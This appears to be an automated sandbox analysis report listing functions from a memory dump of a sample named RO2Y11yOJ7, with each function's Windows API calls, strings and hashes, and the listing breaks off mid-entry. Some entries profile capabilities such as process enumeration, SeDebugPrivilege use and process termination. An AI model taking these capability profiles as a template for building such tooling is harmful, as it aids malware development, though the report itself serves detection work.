                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00397432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?,?,0039777D), ref: 0039744F
                                                            • Part of subcall function 00397432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 0039746A
                                                            • Part of subcall function 00397432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397478
                                                            • Part of subcall function 00397432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?), ref: 00397488
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003B991B
                                                          • _memset.LIBCMT ref: 003B9928
                                                          • _memset.LIBCMT ref: 003B9A6B
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003B9A97
                                                          • CoTaskMemFree.OLE32(?), ref: 003B9AA2
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 003B9AF0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: ac40f146a95a865be4cf74206fc564dd972a34436127630bfc571e819369b057
                                                          • Instruction ID: b9d04f0b77839d0585805b6b6d3fdc2866e275b32e720984e1fd3a6d1adbb60b
                                                          • Opcode Fuzzy Hash: ac40f146a95a865be4cf74206fc564dd972a34436127630bfc571e819369b057
                                                          • Instruction Fuzzy Hash: D6913C71D00229ABDF12DFA5DC81EDEBBB9EF08710F10415AF615AB291DB706A44CFA0
                                                          Function 003C6DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C6E56
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 003C6E6A
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C6E84
                                                          • _wcscat.LIBCMT ref: 003C6EDF
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C6EF6
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C6F24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 3e7008b681b03da08ae65b7b5c2715b33d4a7e698217af0958a99a82e44c99d3
                                                          • Instruction ID: c2e1f7c4bb203ca310a0ce831b87f5d3e4126b747be1a2c3d985b8348f416c9c
                                                          • Opcode Fuzzy Hash: 3e7008b681b03da08ae65b7b5c2715b33d4a7e698217af0958a99a82e44c99d3
                                                          • Instruction Fuzzy Hash: 2C419175A00308AFEB229F64CC86FEE77E9EF08350F11446EF545E7291D6729D848B64
                                                          Function 003BEA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003A3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 003A3CBE
                                                            • Part of subcall function 003A3C99: Process32FirstW.KERNEL32(00000000,?), ref: 003A3CCC
                                                            • Part of subcall function 003A3C99: CloseHandle.KERNEL32(00000000), ref: 003A3D96
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BEAB8
                                                          • GetLastError.KERNEL32 ref: 003BEACB
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BEAFA
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BEB77
                                                          • GetLastError.KERNEL32(00000000), ref: 003BEB82
                                                          • CloseHandle.KERNEL32(00000000), ref: 003BEBB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 8b1419cf0b5a513791495e3a4d6a0ac598cf3d80bf6a95233aeef6e0950c6306
                                                          • Instruction ID: 00a4ac1ca2d1c6886e1bbceae14a8eb890f11a579ffa1b0e8abb6fb7baf4784d
                                                          • Opcode Fuzzy Hash: 8b1419cf0b5a513791495e3a4d6a0ac598cf3d80bf6a95233aeef6e0950c6306
                                                          • Instruction Fuzzy Hash: B041AF312042019FDB16EF68CC96FAEB7A6AF80314F08845DF9429F3D2CB75A914CB95
                                                          Function 003A302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 003A30CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 12c104d76449dcdd81c7cf13e8dbef4304a315424f2fe4a55c948101dc7b4b65
                                                          • Instruction ID: a581f49a69427a81c136c5758488b310b9d4bac6bc8434028214a9163f0e0eeb
                                                          • Opcode Fuzzy Hash: 12c104d76449dcdd81c7cf13e8dbef4304a315424f2fe4a55c948101dc7b4b65
                                                          • Instruction Fuzzy Hash: 4811EB3560830BBED727DB54DC46CBA77ACDF07360F10402AF6069A181DBB16F4046A0
                                                          Function 003A4339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003A4353
                                                          • LoadStringW.USER32(00000000), ref: 003A435A
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003A4370
                                                          • LoadStringW.USER32(00000000), ref: 003A4377
                                                          • _wprintf.LIBCMT ref: 003A439D
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003A43BB
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 003A4398
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: b1ce7d4932d05bc6247e800f17f5d7654b157bb7b2b04a013b96f670fce39c6b
                                                          • Instruction ID: b1811cc404a795d4213089fe40a7373e0f5dd1fc80b2dca7c5f9937efbab4ed2
                                                          • Opcode Fuzzy Hash: b1ce7d4932d05bc6247e800f17f5d7654b157bb7b2b04a013b96f670fce39c6b
                                                          • Instruction Fuzzy Hash: AB0162F690020CBFEB12ABA0DD89EF6776DD708301F0045A5B705E2051EA75AE954B74
                                                          Function 003CD4A8 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • GetSystemMetrics.USER32(0000000F), ref: 003CD4E6
                                                          • GetSystemMetrics.USER32(0000000F), ref: 003CD506
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003CD741
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003CD75F
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003CD780
                                                          • ShowWindow.USER32(00000003,00000000), ref: 003CD79F
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003CD7C4
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 003CD7E7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                                          • Instruction ID: 14c29d17508b38c9494555308593c1b379cda04e5d18e3ba54e32677923189e0
                                                          • Opcode Fuzzy Hash: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
                                                          • Instruction Fuzzy Hash: E6B17835600229AFDF16CF28C989BAE7BB1BF04701F098079FC48EA699D734AD50CB50
                                                          Function 00342A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 00342ACF
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000,000000FF), ref: 00342B17
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 0037C39A
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 0037C406
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 705738447f2618d75423f1b692861673da10d37f1009c10dcbec123b92d828d8
                                                          • Instruction ID: 6a3b28691cf4dc348c37b394adc19c012e21ff29a0dd2220a9d3a7f86fa8f8b8
                                                          • Opcode Fuzzy Hash: 705738447f2618d75423f1b692861673da10d37f1009c10dcbec123b92d828d8
                                                          • Instruction Fuzzy Hash: A34108346147809ED7379B288C8CB6B7BDAEB45300F96C81DF84BBE960CA79B845D711
                                                          Function 003A716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A7186
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003A71BD
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003A71D9
                                                          • _memmove.LIBCMT ref: 003A7227
                                                          • _memmove.LIBCMT ref: 003A7244
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003A7253
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003A7268
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A7287
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: edabab30acaf7512600165f8c22c0ec761835249aeb323a259ccb0474d144139
                                                          • Instruction ID: 500fcf0bff308735ec8c7f1da2d20fd9324f85238a949c573c273cbd5b6c9112
                                                          • Opcode Fuzzy Hash: edabab30acaf7512600165f8c22c0ec761835249aeb323a259ccb0474d144139
                                                          • Instruction Fuzzy Hash: 67318D75900205EFCB169F64DC86EABB7B8EF45710F1485A5F904EF24AD770AE11CBA0
                                                          Function 003C6205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 003C621D
                                                          • GetDC.USER32(00000000), ref: 003C6225
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C6230
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 003C623C
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C6278
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C6289
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C905C,?,?,000000FF,00000000,?,000000FF,?), ref: 003C62C3
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C62E3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 5d8953fee454f050aea4f053b2844568366cd8d6d881dfc7f78c1e37291ffca8
                                                          • Instruction ID: 4f1925038d13dd456aea487152f671b1515804cb82250c4b9f6154cb0e53a099
                                                          • Opcode Fuzzy Hash: 5d8953fee454f050aea4f053b2844568366cd8d6d881dfc7f78c1e37291ffca8
                                                          • Instruction Fuzzy Hash: 0B314F72201214BFEB128F54DC4AFEA3BAEEF09761F054065FE08DA291C675AC51CB64
                                                          Function 003AEBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                          • _wcstok.LIBCMT ref: 003AED20
                                                          • _wcscpy.LIBCMT ref: 003AEDAF
                                                          • _memset.LIBCMT ref: 003AEDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 8df33dd9519e31afeaa0abc6f9c209aaea5e9e79da19d62a85aec3532011347b
                                                          • Instruction ID: b978cc1c4ccc083b08131ead198dfa84bb08b68d45a2b77e7448a628dfc1c2b4
                                                          • Opcode Fuzzy Hash: 8df33dd9519e31afeaa0abc6f9c209aaea5e9e79da19d62a85aec3532011347b
                                                          • Instruction Fuzzy Hash: 8EC15A755087409FC726EF24C881A6AB7E4FF85310F05892DF8999F2A2DB70ED45CB82
                                                          Function 003B6C19 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003B6D16
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B6D37
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6D4A
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 003B6E00
                                                          • inet_ntoa.WSOCK32(?), ref: 003B6DBD
                                                            • Part of subcall function 0039ABF4: _strlen.LIBCMT ref: 0039ABFE
                                                            • Part of subcall function 0039ABF4: _memmove.LIBCMT ref: 0039AC20
                                                          • _strlen.LIBCMT ref: 003B6E5A
                                                          • _memmove.LIBCMT ref: 003B6EC3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: 8f0a325c02317ea4c783300fe17a524400f71cee90aebc8ce8bf34912233eadf
                                                          • Instruction ID: 9fcb7af9e91930ab89162ead0523cbf3c9e16a39efa384ecb23fb57c3f95d170
                                                          • Opcode Fuzzy Hash: 8f0a325c02317ea4c783300fe17a524400f71cee90aebc8ce8bf34912233eadf
                                                          • Instruction Fuzzy Hash: C7819B71504200ABD712EB24CC86FAFB7E9EB84718F144929F6559F2A2DB74ED04CB91
                                                          Function 00341424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3bfc412de79de81f318a0a8dc68d09e71b5c35c43d134cda6745f1d5e4e8af8
                                                          • Instruction ID: 5b302c84451a884486485dda42479ad549744ef851bf215b9c176ec1e3c2857a
                                                          • Opcode Fuzzy Hash: e3bfc412de79de81f318a0a8dc68d09e71b5c35c43d134cda6745f1d5e4e8af8
                                                          • Instruction Fuzzy Hash: EA717A30900509EFCB16CF99CC89EBEBBB9FF85314F158159F915AA251C734AA91CFA0
                                                          Function 003CB385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(01745310), ref: 003CB41F
                                                          • IsWindowEnabled.USER32(01745310), ref: 003CB42B
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003CB50F
                                                          • SendMessageW.USER32(01745310,000000B0,?,?), ref: 003CB546
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 003CB583
                                                          • GetWindowLongW.USER32(01745310,000000EC), ref: 003CB5A5
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003CB5BD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: 739b3c665b64032864accc35d8d1790767358be0522054663f331c45718fe2dd
                                                          • Instruction ID: 9c00060e94467037b3ad01bd496e6058617b3bebb1d34de57d8b181f55cfd61c
                                                          • Opcode Fuzzy Hash: 739b3c665b64032864accc35d8d1790767358be0522054663f331c45718fe2dd
                                                          • Instruction Fuzzy Hash: 3071AD34608244AFEB269F65C896FAAFBB9EF09300F15406DE955E72A2C731AC50DB10
                                                          Function 003BF532 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003BF55C
                                                          • _memset.LIBCMT ref: 003BF625
                                                          • ShellExecuteExW.SHELL32(?), ref: 003BF66A
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                          • GetProcessId.KERNEL32(00000000), ref: 003BF6E1
                                                          • CloseHandle.KERNEL32(00000000), ref: 003BF710
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: 2ebc004e14a27f4b0fd14d9f8593c1833dd3ed42994d6fabc67f868c35c9513a
                                                          • Instruction ID: 62f3383804e21e10282da66b7589e293a2514cde646a99470054186c2197aac8
